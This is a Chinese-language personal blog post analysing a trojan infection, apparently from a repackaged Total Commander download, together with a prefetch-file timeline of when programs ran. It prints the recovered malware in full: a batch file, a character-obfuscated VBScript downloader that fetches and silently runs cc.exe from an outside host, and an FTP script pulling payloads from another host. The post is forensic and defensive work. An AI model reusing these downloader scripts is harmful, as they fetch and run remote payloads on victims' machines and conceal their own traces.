三里蜂巢

xdowns 绿色下载站,怀疑对象

今天中木马了,怀疑对象是早上下的几个文件,最大的怀疑对象是xdowns.com下的total commander7.5 beta1 绿化版.

但运行前用nod32扫了一下过,并没有发现什么,或许是以前下的什么东东?要不用了免杀?要不就是通过局域网传播的?

过程:

先是360跳出危险进程正加入启动项,叫soundman.exe(名字取的不错)

查看网络连接里多了x0xx.exe连上了十几个IP

引起了吾的注意,先用恶评插件扫描,扫出两个,ftppopo木马和soundman广告程序,

但需重启后清除.于是重启.可明显360忒弱.搞不干净.

这回换NOD32报警了,明明没上网.提示发现某网页图片带毒,清理了NOD32找出的几个exe.

再搜索C盘当天创建的新文件,发现bai.bat bai.vbs help.dll三个文件陌生.

看了下内容,似乎比较简单,就用ftp下载主页的cc.exe,cc1.exe然后运行

bai.bat

del cc.exe
ftp.exe -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sfd -s:C:\WINDOWS\help\help.dll
if not exist cc.exe sft -s:C:\WINDOWS\help\help.dll
cc.exe
cc.exe
cc1.exe
cc1.exe
if not exist cc.exe C:\WINDOWS\help\bai.VBS
:end
del C:\WINDOWS\help\help.dll
del C:\WINDOWS\help\bai.BAT
exit

bai.vbs

on error resume next
set oshell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
Set xPost = CreateObject(Chr(77)+Chr(105)+Chr(99)+Chr(114)+Chr(111)+Chr(115)+Chr(111)+Chr(102)+Chr(116)+Chr(46)+Chr(88)+Chr(77)+Chr(76)+Chr(72)+Chr(84)+Chr(84)+Chr(80))
xPost.Open Chr(71)+Chr(69)+Chr(84),Chr(104)+Chr(116)+Chr(116)+Chr(112)+Chr(58)+Chr(47)+Chr(47)+"www.fgetchr.cn:83/rc/zj/gx"+Chr(46)+Chr(106)+Chr(112)+Chr(103),Chr(48)
xPost.Send()
Set sGet = CreateObject(Chr(65)+Chr(68)+Chr(79)+Chr(68)+Chr(66)+Chr(46)+Chr(83)+Chr(116)+Chr(114)+Chr(101)+Chr(97)+Chr(109))
sGet.Mode = Chr(51)
sGet.Type = Chr(49)
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile "cc"+Chr(46)+Chr(101)+Chr(120)+Chr(101),Chr(50)
oshell.RUN "cc"+Chr(46)+Chr(101)+Chr(120)+Chr(101),vbhide
oshell.RUN "cmd.exe /c del C:\WINDOWS\help\bai.VBS",vbhide

help.dll

OPEN crr.fdu8.cn
168
get crr.ini cc.exe
get crt.ini cc1.exe
bye

凡走过必留下痕迹,在C盘查找当天修改过的文件时,发现了很多.pf文件,

放狗一搜,发现是XP预读文件,即运行任何.exe程序,就会在c:\windows\prefetch下留下一个程序名+字符串+.pf扩展名的预读文件,该文件的创建时间就是该程序首次运行的时间.

时间	运行程序
08:17	CTERM.EXE-0092328C.pf	cterm
08:18	PLINK.EXE-39A950BB.pf	cterm
08:18	CONIME.EXE-13EEEA1A.pf
08:19	NOTEPAD.EXE-189578DA.pf	笔记本
08:23	I_VIEW32.EXE-00524BD4.pf	irfanview
08:38	WINRAR.EXE-39C6DAD9.pf	解压缩	解压的就是total	?
08:43	REGSVR32.EXE-25EEFE2F.pf		注册了什么?	?
08:44	NOTEPAD.EXE-336351A9.pf	笔记本
08:57	白云草地.SCR-378720D2.pf	预设屏保	10分钟空闲
08:57	PING.EXE-31216D26.pf		不对劲了,谁PING的?ping 谁	?
09:02	Layout.ini
09:09	CMD.EXE-087B4001.pf	dos运行	毒在下载?use ftp?	?
09:09	GRASPNET.EXE-0B918C46.pf	管家婆网络版
09:10	GRASPSVR.EXE-2DEFD5FB.pf	管家婆服务器
09:11	HH.EXE-2D1A70B3.pf	chm阅读
09:11	XOXXO.EXE-0B434BD4.pf	毒发		!
09:11	SCKTSRVR.EXE-016C0AD5.pf	管家婆套接字
09:14	360REALPRO.EXE-362BB6E8.pf
09:16	FGKEY.EXE-0AA7CFBC.pf			!
09:18	AUTOCHK.EXE-2F8C59C3.pf			!
09:18	SMSS.EXE-22F38377.pf
09:18	CSRSS.EXE-12B63473.pf
09:18	WINLOGON.EXE-32C57D49.pf
09:18	SERVICES.EXE-2F433351.pf
09:18	LSASS.EXE-20DB6D1B.pf
09:18	LOGONUI.EXE-0AF22957.pf			!
09:18	SPOOLSV.EXE-282F76A7.pf
09:18	EXPLORER.EXE-082F38A9.pf
09:18	USERINIT.EXE-30B18140.pf
09:18	EKRN.EXE-1C5A1FAB.pf	nod32
09:18	MOZYBACKUP.EXE-0BF614CF.pf
09:18	LSESVC.EXE-12E9827A.pf
09:18	GOOGLEUPDATE.EXE-1E123D86.pf	google自动升级
09:18	UPCLT.EXE-00E321FD.pf			!
09:18	RUNDLL32.EXE-1557771B.pf
09:18	SQLSERVR.EXE-0E1BC080.pf
09:18	NVSVC32.EXE-1F9EED18.pf
09:18	SPNSRVNT.EXE-2F7B0B31.pf
09:18	SMLOGSVC.EXE-054B1E6C.pf
09:18	WDFMGR.EXE-2CF4013B.pf
09:19	EGUI.EXE-1E959554.pf	nod32
09:19	ALG.EXE-0F138680.pf
09:19	360TRAY.EXE-01032BE2.pf	360
09:19	EGUI.EXE-04F201EB.pf	nod32
09:19	CTFMON.EXE-0E17969B.pf
09:19	ATNOTES.EXE-0DD737CD.pf
09:19	SQLMANGR.EXE-0150BA62.pf
09:20	360SAFE.EXE-272F6EFC.pf
09:21	UNINSTALL.EXE-2FBB2708.pf
09:21	AU_.EXE-3050D4ED.pf			!
09:22	SVCHOST.EXE-3530F672.pf
09:23	MMC.EXE-22FA564C.pf
09:24	WMIPRVSE.EXE-28F301A9.pf
09:29	OPERA.EXE-294893A7.pf
09:44	RUNDLL32.EXE-12E27DD0.pf

XOXXO.EXE-0B434BD4.pf 的创建时间是09:11

说明xoxxo.exe 运行时间09:11

离它最近的是hh.exe,嫌疑最大,GRASP次之,

但由于之前莫名其妙的REGSVR32,ping,cmd,和xdowns一贯不良好的信用,有理由怀疑就是解压的totalcommander带毒.

虽然目前是清净了,且看明天会不会再出现.